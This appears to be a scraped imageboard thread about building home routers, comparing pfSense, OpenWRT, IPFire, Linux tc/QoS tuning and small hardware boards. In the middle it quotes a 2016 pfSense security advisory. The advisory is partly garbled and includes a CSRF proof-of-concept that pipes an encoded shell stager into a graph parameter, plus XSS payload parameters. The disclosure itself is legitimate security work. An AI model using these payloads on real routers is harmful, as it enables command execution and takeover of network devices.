Building a router from scratch

I just build a cheap AM1 system with an Athlon 5150. I then set up iptable and installed gentoo. From there, I set it up as basically some sort of mix between HTPC, emulation machine, and router. It also has some cloud services like owncloud. Most importantly, though, is I mount ssh shares when I'm away and still have access to all my music (my upload is shit so I can't stream my own videos to myself).

I'll never go back again.

Linux distro plus manually configured iptables is completely overkill for a router.
I would go with pfsense or openwrt.

pfsense

Pfsense just werks, easily configurable, well supported, tons of addons/plugins, shitloads of forums dedicated to support. I just wish it played nice with USB NICs, you pretty much need to have 2 network ports for usefulness, which writes off many small form factor devices.

Pfsense just werks, easily configurable, well supported, tons of addons/plugins, shitloads of forums dedicated to support. I just wish it played nice with USB NICs, you pretty much need to have 2 network ports for usefulness, which writes off many small form factor devices.

Pfsense just werks, easily configurable, well supported, tons of addons/plugins, shitloads of forums dedicated to support. I just wish it played nice with USB NICs, you pretty much need to have 2 network ports for usefulness, which writes off many small form factor devices.

You can have one nic then use vlans to create separate wan and lan ports.

Bit of a cunt but it's a well documented work around.

You can have one nic then use vlans to create separate wan and lan ports.

Bit of a cunt but it's a well documented work around.

pcengines has decent coreboot support on their Geode stuff because they open sourced their own BIOS. That should tell you what type of company they are.

I build fairly high-end routers. Linux's networking stack is far superior to OpenBSD's but most people want something easy which is where pfSense shines. Manually configuring a non-trivial QoS setup on Linux and having it perform well is the blackest of magic and very poorly documented.

Superior performance yes but actual config no.

pf and pfsense have spoiled me, iptables is pure cancer.

iptables is fine other than having to roll your own client as it has O(n^2) performance (try adding a few thousand rules and print the time every 100 added). tc is where it becomes Lovecraft. It is an absolute nightmare. Find a person who thinks it is not a nightmare and I guarantee you they've only done tiny configurations with it that don't expose the madness or have never tried to do things as simple as remove a subset of rules without rebuilding. I've written databases that had less sophisticated code than the code I wrote to manage tc, and I wish that was an exaggeration.

OpenBSD has no equivalent to tc that isn't a toy, so it's not like there's much choice. In the BSD world, if you want QoS whose target audience isn't a home user running bittorrent you go the proprietary kernel module route.

i just sort the packets by hand

You can use VLAN's with a single NIC.

you would need layer 3 switches. much cheaper to just get a 4 nic pcie card.

I built my own router/firewall with a gigabyte mini-itx board which has a pentium cpu soldered on it + 2 Gbit NICs (120€ in germany) then bought 1 each of PCI and PCI-E Gbit-NIC (5€ each) + Case with integrated power supply (plenty of watts I think 90) for 80 €.
Installed IPFire on it and am happy since. Running for almost 2 Years now without the need to maintain anything other than firewall rules (regularly updates every week on the go).

Also uses strong encryption (x86 hardware encoding).

...

but what if fpgas contain nsa blobs?

Date: Fri, 15 Apr 2016 14:54:55 +1200
From: Francesco Oddo
To:
Subject: [FD] PfSense Community Edition Multiple Vulnerabilities
Content-Type: text/plain; charset="utf-8"

( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ __ ___
\__ \==/ /_\ \ _/ _\/ _ \ / \
/ \/ | \\ \__( ) Y Y \
/__ /\_| / \_ >/||_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_="=.

presents..

PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition \' > shellexec')encoded_stager = ''for c in stager: encoded_stager += "\\\\%03d" %(int(oct(ord(c))))print encoded_stager

[CSRF POC]
function sploit() { var query = "database=-throughput.rrd&graph=file|printf[ENCODED_STAGER]|sh|echo "; var xhr = new XMLHttpRequest(); xhr.open("GET", "/status_rrd_graph_img.php?" +query, true); xhr.withCredentials = true; xhr.send(); setTimeout(shellexec, 2000); } function shellexec() { document.csrf_exploit_exec.submit(); }

Cross-site Scripting
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users? session and extend their
access to administrative areas of the application (i.e. command prompt
functionality).

Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => alert(1)
Render => /system_gateways_groups_edit.php
Type => Stored

Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => ">alert(1)
Render => /firewall_shaper_layer7.php
Type => Reflected

Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => ">alert(1)
Render => /firewall_shaper_vinterface.php
Type => Reflected

+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.

+------------+
| Timeline |
+------------+
10/02/2016 ? Initial disclosure to pfSense.
11/02/2016 ? Vendor confirms receipt of advisory and provides fixes.
16/02/1016 ? Sent follow up email about public release.
16/02/2016 ? Vendor requests advisory disclosure after release of new
software build.
12/04/2016 ? Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 ? Public disclosure of security advisory.

+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+------------+
| References |
+------------+
pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc

...

You're a sad pepe because pfsense is getting security fixes?

...

Are there seriously people that use pfsense with the webgateway internet facing?

The only way to remotely manage my pfsense box is to log into its vpn then manage it via the local lan address, I don't even allow remote ssh.

What kind of dumb fuck netadmin would put that obvious mess of a UI on the internet?

No just the webui.

THIS!

You'll be surprised.

so that's

software
pfsense x6
openwrt x3
ipfire x2
openbsd (for the brave) x2
notlinux x2
gentoo (this was for a htpc build)

hw
pcengines
mips
fpga (i think this is a joke)

seems like Holla Forums prefers pfsense but not much mention of hardware choices

What is the point? Just buy a router, much easier and it just works.

still bumping because it's at least technology on the technology board

While there are some valid reasons to build your own router, given the amount of effort and knowledge required I'm going to say that you don't really need a valid reason. People do it because they want to, and they want to just because they can.

If you're talking about QoS for a small home network, then it's easy.
-For upload, Just set up a classful root qdisc (htb is popular nowadays) on the desired interface, then add some classes to it (e.g. htb), each with their own bandwidth, and possibly a good leaf qdisc (e.g. fq_codel to reduce bufferbloat)
-After that, either use the built-in filters in tc to classify (e.g. any field on a packet's ip header, mac addresses), or mark packets using iptables, then add a tc filter for each specified mark.
-For download, redirect traffic to an ifb device, then repeat the above for it.

The only shit I couldn't figure out are the other kinds of tc filters involving the kernel estimator given the scant amount of documentation.

Also, I could never get the burst parameter to work in htb (all classes end up with negative tokens), so I had to disable bandwidth sharing between classes.

Stock router firmwares are shit, and I really mean it:

...

The issue is in an enterprise firewall environment, where exploitation could occur from either side.

Bump.
Just to be shure, I can use pfSense as a wifi router and firewall combo? Hopefully the range will be better than the current one. If not at least it won't be EOL like the current in all one box.

Yes.

Explain.

but those gate array things are what NSA uses to get enough processing power to spy on people. they wouldnt need to bd their own shit lol also normies dont use FPGAs they use regular shit ass unconfigurable processors that contain integrated 3g spychips

Thanks for the quick reply. Is it possible to DIY a modem, which respect my software freedoms? I assume is talking about how both internal and external actors are trying to gain unathorised access to areas. When compared with a home/personal environment where usually only external actors are trying to gain unathorised access.

Is it possible to DIY a modem
No, even the old VIKING VDSL cards are really just closed off modems with an interface.

Best you can do is if you have something like fibre and then you can do PPPoE directly in pfsense.

Otherwise you will need a modulator and I have found zero open source version of those.

You have a point there, you can still restrict that to an admin vlan... I should probably set that up.

my setup:
-Odroid C1+
-SATA HDD connected via a USB adaptor
-debian image
-haveged becuase it be doing cryptos and shiiet and my hw rng is broken for some reason
-a separate physical switch to have ethernet LAN because why the hell not? a lot cheaper than devices with multiple eth ports
-a usb WiFi dongle running github.com/oblique/create_ap for wireless LAN
-with ssh and tmux you now have an always online linux system you can access anywhere

underrated post

What about DD-WRT?

...

I'm talking about QoS for a non-trivial setup, not a home user (all they ever need is a HTB limiter on upload). Managing tc with a lot of filters (a few thousand) and non-awful performance (almost every tutorial does it wrong and will lead to every filter tested for every packet) requires you to write a btree because the kernel makes no attempt to balance the filters across hash tables itself and documentation on the millions of edge cases in the hash table code is almost non-existent. It also gets extremely tricky to make transactional updates - unlike with netfilter there's no underlying transactional interface that can replace all rules simultaneously so you have to carefully engineer a way for it to be effectively transactional. It's a nightmare.
I'd strongly recommend against it, it will fuck up so much software and I learned this the hard way by deploying it and then getting complaints. They monkey with burst such that packets start dropping after about 30 sent near simultaneously. So I had a server that sends tiny heartbeats to connected clients once every 10 seconds and for efficiency reasons this was done with one timer. Once I had more than 30 clients the last clients to connect (so always the last in the datastructure I iterate over) would have their heartbeat dropped by fq_codel. This was a stable pattern (obviously it should not be, but such is the state of fq_codel) and would eventually lead to perfectly healthy clients getting disconnected. I pride myself on my code being perfect and I was furious that fq_codel's retarded design made my code look bad.
Most of the QoS modules on Linux have hidden trainwrecks like that, by the way. Their SFQ implementation has a large, fixed internal buffer of 128 packets that wasn't documented anywhere although I heard it's now configurable. That's HUGE for consumer-tier connections and will quietly cause disgusting amounts of latency which a lot of people won't notice as they don't know how to check TCP sequence graphs, they'll just run a ping along-side a wrecked TCP session and think nothing's wrong as it looks great.

That answers nothing.

This is the hardware at my disposal. What would you do with it? I don't understand the slightest thing about software & I just play with hardware and embedded things. But I was thinking that I should use bhyve or qubes os to simultaneously run freenas (zfs2 file system) and pfsense (seedbox the server contents) on the server. I guess I can half and half the CPU and pfsense would probably be happy with 512MB-1GB of RAM. But will splitting it asymmetrically cause the ECC to fuck up? I'm happy for pfsense to control the PCI bus, but what about usb bus? I need that for freenas. Can that be shared? How does one share data between two virtual environments running simultaneously on the same machine?

My LAN card supposedly comes with a built-in "bypass switch". I don't even know what that is nevermind how to use it. I also have a bunch of old cisco switches and routers. Essentially I have a whole toy store's worth of toys but I'm wholly ignorant in how to utilize them. Also most of it is expensive stuff and I don't want to trash it.

What could I be doing with it to spread love & joy more than I'm doing now with it sat unused?

Use it to learn the software side of things, if I didn't already know. I'm not a fan of NAS or network services sitting behind a consumer ISP connection.
I have no idea about AMD but AFAIK everything outside of the embedded space has been doing NUMA with multiple memory controllers for 10-15 years and there will be no difference.
They're used for fail-to-wire setups (converts to a switch rather than converts to a brick). Unless you're learning how to build a fault-tolerant setup just avoid it as it will cause unexpected problems that are difficult to debug (like inadvertently bridging two segments for brief moments).

Then what do you recommend to maintain responsiveness (i.e. low latency for interactive stuff), on a small home network?
HTB qdisc and classes alone haven't been cutting it for me (always reports 0 dropped packets) Should I use a sfq qdisc, policing filters, or look into something else entirely?

Asking because I can barely find information beyond
and

bump

The only thing that really matters for them is throttling upload so they don't fill the path (which can be comically huge when misconfigured). That's night and day improvement as far as users are concerned; if you've set it up right there's no way you'll not notice the effect. Everything else is a micro-optimization at that speed and can be ignored. Now the bad news: without a SLA (so, basically every home network) this won't work reliably as upload speed varies throughout the day. If it dips below what you've throttled it to it is effectively removed. Still, works /ok/ when the alternative is something like MPL$.
You'll need to check your HTB configuration as you should almost immediately see drops when running iperf. Also be sure you understand that you must throttle your connection below its true bandwidth or nothing will ever be dropped and there will be no queue to do queue management on. Try throttling down to like 100Kbit just to be sure you got the rules right. Hit speedtest.net and verify you get the speed you chose.
Yeah, that part of Linux is like that. brouting is pretty poorly documented/understood, too.

I know journalism is pretty much dead, but has some enterprising soul on a technology reporting website gone through the trouble of listing ISPS that allow DIY routers? I feel like building one, but I don't want to have to use an ISP that disallows it.

PCENGINES is by far the cleanest and most compact solution.

5-10W max power consumption. Serial port for console output (I use an ancient PocketPC i bought on ebay as a serial console.... display and keyboard in a tiny package.

The old Alix boards (can be found dirt cheap on eBay all day every day) will do 85-90mbit bidirectionally. Add in some QOS and shit and you still can maintain 65-80mbit depending on complexity.

MAKE SURE YOU GET THE 256MB VERSION! The 128MB version is limited to pfSense 1.x or m0n0wall forks

The new APU boards are a lot more powerful, I would get the newer revision with the quad core APU and 4GB ram. These will do 600+mbit easy.

For software, I like to use m0n0wall (or t1n1wall or smallwall) for the Alix boards. These are fast as shit, very low latency

PFSENSE or OPNSENSE can be used on the APU boards.

In all cases, try to avoil realtek nics. people are saying the drivers are hit or miss depending on chip revision and it could compromise performance.

I have also used Atom boards (NM10, with dual broadcom gigabit) and it worked fine, but a bugger footprint and more noise & heat than the Alix and APU boards.

I have also heard good things about mikrotik routers. dirt cheap for the speed/features of what you get.

People say that the OS is a pain to earn but from screenshots it looks pretty straightforoward???

they all should? worst case have the router clone your modem's mac address.

Wow. She's totally obs such xtreme codeher that she needs a 1337 helmet cam.

Been looking for a cheap open source SoC to use as server\router. Did I find a good one?

banana-pi.com/eacp_view.asp?id=64

is there any evidence of this or is it just from intel marketing where they're talking about servers with extra hardware?

I've messed around with Banana Pis before, the company that makes them has no idea what support means. Outside of the original and the Pro I wouldn't recommend getting one. At least it's an Allwinner A20, so it's well documented if you want to build a Linux distro for it.
You might want to consider connecting an SBC with one ethernet port to an ethernet switch. It's slower, but that way you can choose from a wider variety of boards. I use a Cubietruck, because it has 2GB RAM and gigabit ethernet. The Cubieboard 2, Olimex Lime2 A20 and Odroid C1/C1+/C2 are also good choices for a server, and are cheaper than the Cubietruck.
Allwinner's A20 page won't load for me right now, but I'm pretty sure the chip only supports one gigabit ethernet port. I might be wrong, but it's possible lots of these multi-ethernet boards just have a switch built in.

It's conspiracy shit - they support 3g events but coming from attached hardware. It's not built-in. However, I think building it in is the direction they'll go so don't be surprised in a few years when they announce it.

Sure, nothing intel says at this point would really surprise me. But it's really hard to have a proper conversation about this when tinfoilfags make you look retarded by association

Holy shit guy are you asking for a headache? Get a PCEngines or something.

bump

Pine64
$15-$19-$29
All of them use the same 1.2 Ghz Quad-Core ARM Cortex A53 64-Bit Processor. The $19 version gets double the ram at 1 gig and gbps Ethernet, the $29 Jews you out of 10 more sheckles for 2 gigs of ram and nothing else.

The GPU is a little weaker but more open than the pies.

The pie runs all its shit through a single hubbed out usb channel this board has dedicated gigabit and two usb channels and for me this is quite important because i do alot of intensive usb and network shit at the same time and I get pissed that on my pie everything is always fighting for usb bandwith.

I think the pine64 is the best board for the cost currently avalable. Running 4 hd webcams off one of them now, simultaneously live streaming them and recording on my nas. Cheap enough I think I will buy a few more.

It would take a preeeeeeetty impressive backdoor to analyze your hardware implementation and send back any meaningful data. Now, I don't think Intel would be above doing so if they could, but I simply don't think they can.

Periodically sampling/caching signals throughout the module would only work on trivially small designs, because even at low frequencies (say 10 MHz) something like a small CPU will have a metric shitload of state transitions for all the different registers and nets within it. So, a backdoor would require some sort of semantic understanding of the design, only collecting signals that are "interesting". That's a privilege they have with their own products, but not something they have for all the different stuff you could throw on an FPGA.

do the lights make it go faster?

i use it, its pretty good

Only if they are bright red and built for speed.
What is it like being the king of the ant people?

How would one go around doing such a thing when fibre eventually comes? I assume it is more to it than just "plug fibre cable into first, 1GiB ethernet port then connect to ISP via PPPoE"
Also is there a reason why connecting via PPPoE in Pfrsense won`t work with VDSL(2)?

VDSL ppoe can be done but you still need a modem in bridged mode

Excellent. That will work out very nicely hopefully.
Any stand out features?

bump

This, at least for mobile processors. As the cost comes down it will be integrated just for the purpose of saving room and lowering overall device costs. Also wouldn't be surprised if SBCs like the Raspberry Pi start including a cellular modem in a few years for the same reason.

Anyone using OPNsense?

bump

Neat

If you want a high performant network stack go FreeBSD. I'm curious how Solaris holds up today for such a task.

Just get ubiquiti edgemax. Waste of time building your own that will cost more and perform worse (cavium cpu does routing/nat/pppoe/dpi offload in hardware). Full access to underlying linux for advanced shitz.

Over many years I've used a bunch of off the shelf routers at home, custom firmware, cisco, DIY linux and bsd based routers, and finally found something that does exactly what I want with no BS.

Isn`t the code non free though?

I smell shillary afoot tbh smh.

That's awesome

Does the free bios mean that libreboot support might be possible before the heat death of the sun?

That was pretty much just for corporate class laptops.

Thanks of the laugh.

...

Now that the FCC is making it illegal to remove NSA backdoors from routers, it's more important than ever to know how to make botnet-less routers. A thread on libre de-botnetted routers deserve to be made a sticky thread.

Did it pop in her eye?!! OUCH

HTB classes default to FIFO qdiscs, which are a definite no-no, as 1 heavy flow will starve a class. You need to specify a leaf qdisc.

Making a basic home router is as easy as slapping 2 gigabit NICs on a low spec PC and installing a router distro. You can even throw in a wireless NIC and host an AP off it.

The real problem is with wireless APs, which will be locked down because of muh radars. This, of course, fucks over any country that's not America (and America too; stock router firmware is shit)

You can somewhat mitigate the botnet problem with the above, but you won't be able to lift the hardcoded restrictions on channels and tx power, even if they don't make any fucking sense for your local area (5600-5650 MHz is legal in the US, but illegal in my region, yet my region-locked router allows picking it. Thanks faggots at FCC)

How can a regon locked router allow to access a illegal option unless this was a recent change?

Because manufacturers and the FCC only give a shit about the US and I can't override the country setting.

No, they aren't, you clueless faggot.

the fuck

Holla Forums software is shit. are you new?

underrated

Bump

so has anyone tried it as a result of this thread?

the same way.

What the fuck does that mean. Computer comes with builtin ethernet. I just added a $5 USB to ethernet adapter. Now I have a connection to the modem and to the switch.

yes I always wanted an open source version of my do-everything-but-do-nothing-right consumer trash

How to build a router from scratch:

Done.

relying on openwrt is like trusting a bunch of game modders to secure your network. just because you can replace the textures in skyrim doesn't mean you know how to build a secure operating system

a $5 usb ethernet adapter is gonna bottleneck your bandwidth. not saying it wouldn't work with usb 3 and a decent adapter but a cheap shit one is going to be cheap shit

I don't even understand how you would fucking get a internet connection without an ISP.

ISPs have brainwashed me.

who said anything about an ISP?
are you assuming every ISP makes you use their router with no option to switch it out?

I` l give it a go in the next few day's.

Bumpth.

I build routers for a living. You'd be horrified if you knew how insecure and broken the commercial offerings were. Code quality is as low as it gets outside of webdev.

Is there anything lower than webdev besides 1 year third level education in terms of code quality. Also I am not suprised seeing as the latest security flaw is based off not even security 101, check inputs and the advanced level see if they match expected values.

From scratch? Nah, not for a home setup.

Just buy an old WRT54G for $5 off the flea market / ebay and install dd-wrt on it.

enjoy your 54 mbps transfer speeds retard it isnt 2006 anymore
ddwrt and openwrt are jokes when it comes to real networking
stop buying consumer routers they are trash

I wish, my ISP caps my connection at 10 mbps

forum.pfsense.org/index.php?topic=112558.0
Looks like we may finally see pfSense on ARM soon. Relevant tweets: (ignore the retarded replies)
archive.is/NOv08
archive.is/WRAyr
archive.is/C5aPQ

yeah because you cant use transfer data on a local network right ? so who needs a fast router xddd my le isp doesnt let me have that much anywayyy

I am thinking of the two following quad core processors for a NAS and a pfSense box. Would it be better to go with the older generation with a lower TDP or a newer generation with a higher TDP?
AMD 53502.05Ghz4 25W
AMD A8-76003.1GHz 465W

I am thinking of using the following CPU`s, which one would be better suited for 24/7 use? The older generation with a lower TDP or a newer generation with a higher TDP?

AMD 53502.05Ghz4 25W
AMD A8-76003.1GHz 465W

I posted a slightingly differently worded version and haven't recived a response in 24hrs. Also bumping this worth while thread.

Because you need those 2 4K movies streamed from your NAS playing simultaneously on your dual monitor setup don'tcha? :^)

I`l go with the lower TDP one.

I used a 5150 and it's great. I bought a used Intel 4 port PCIe switch on amazon, the whole think pulls 20w from the wall and 50w under full load. I used the Asrock motherboard that uses a laptop power supply and just used a spare laptop power supply I had laying around.

Just use a full Linux distro, the guide on the official gentoo wiki is good for a home router and it should work on anything with iptables

Thanks for the reply. I was thinking of going the mini-itx route with a pico PSU and 1.3 volt RAM. Also would it be worth while to down clock the APU to 1.8 GHZ or so? I am thinking of using Pfsense as it is good to have detailed graphs available and I currently don't know how to write iptables.

For those who rely on fq_codel to have an Internet connection that actually works, does this mean that pfSense and other non-Linux router distributions are out of the question?

Really want to stick with pfSense, but I can't eliminate my internet connection's really bad bufferbloat issues.

bloop